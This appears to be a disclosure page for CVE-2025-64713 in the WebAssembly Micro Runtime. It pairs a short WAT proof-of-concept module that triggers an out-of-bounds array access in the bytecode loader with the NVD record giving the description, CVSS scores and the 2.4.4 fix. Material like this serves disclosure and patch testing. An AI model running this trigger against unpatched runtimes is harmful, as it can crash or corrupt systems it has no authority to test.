CVE-2025-64713

// PoC for CVE-2025-64713: WAMR Out-of-Bounds Array Access // This PoC generates a malicious WASM bytecode that triggers the vulnerability // Compile with: wat2wasm poc.wat -o poc.wasm (module (func $trigger_oob (result i32) ;; Fill local slots to capacity (simulate condition) (local i32) (local i32) (local i32) (local i32) (local i32) (local i32) (local i32) (local i32) (local i32) (local i32) (local i32) (local i32) ;; Get global to trigger uneven array expansion (global.get 0) ;; Use if block to trigger preserve_local_for_block ;; This will cause OOB access on frame_offset_bottom (if (result i32) (then (local.get 0)) (else (i32.const 0)) ) ) (global i32 (i32.const 0)) )

{"cve": {"id": "CVE-2025-64713", "sourceIdentifier": "[email protected]", "published": "2025-11-25T23:15:47.763", "lastModified": "2025-12-03T18:45:40.897", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebAssembly Micro Runtime (WAMR) is a lightweight standalone WebAssembly (Wasm) runtime. Prior to version 2.4.4, an out-of-bounds array access issue exists in WAMR's fast interpreter mode during WASM bytecode loading. When frame_ref_bottom and frame_offset_bottom arrays are at capacity and a GET_GLOBAL(I32) opcode is encountered, frame_ref_bottom is expanded but frame_offset_bottom may not be. If this is immediately followed by an if opcode that triggers preserve_local_for_block, the function traverses arrays using stack_cell_num as the upper bound, causing out-of-bounds access to frame_offset_bottom since it wasn't expanded to match the increased stack_cell_num. This issue has been patched in version 2.4.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.4, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.4, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bytecodealliance:webassembly_micro_runtime:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.4.4", "matchCriteriaId": "FC2929DB-4D93-47DC-BA0C-10BAE8760C2B"}]}]}], "references": [{"url": "https://github.com/bytecodealliance/wasm-micro-runtime/releases/tag/WAMR-2.4.4", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-gvx3-gg3x-rjcx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}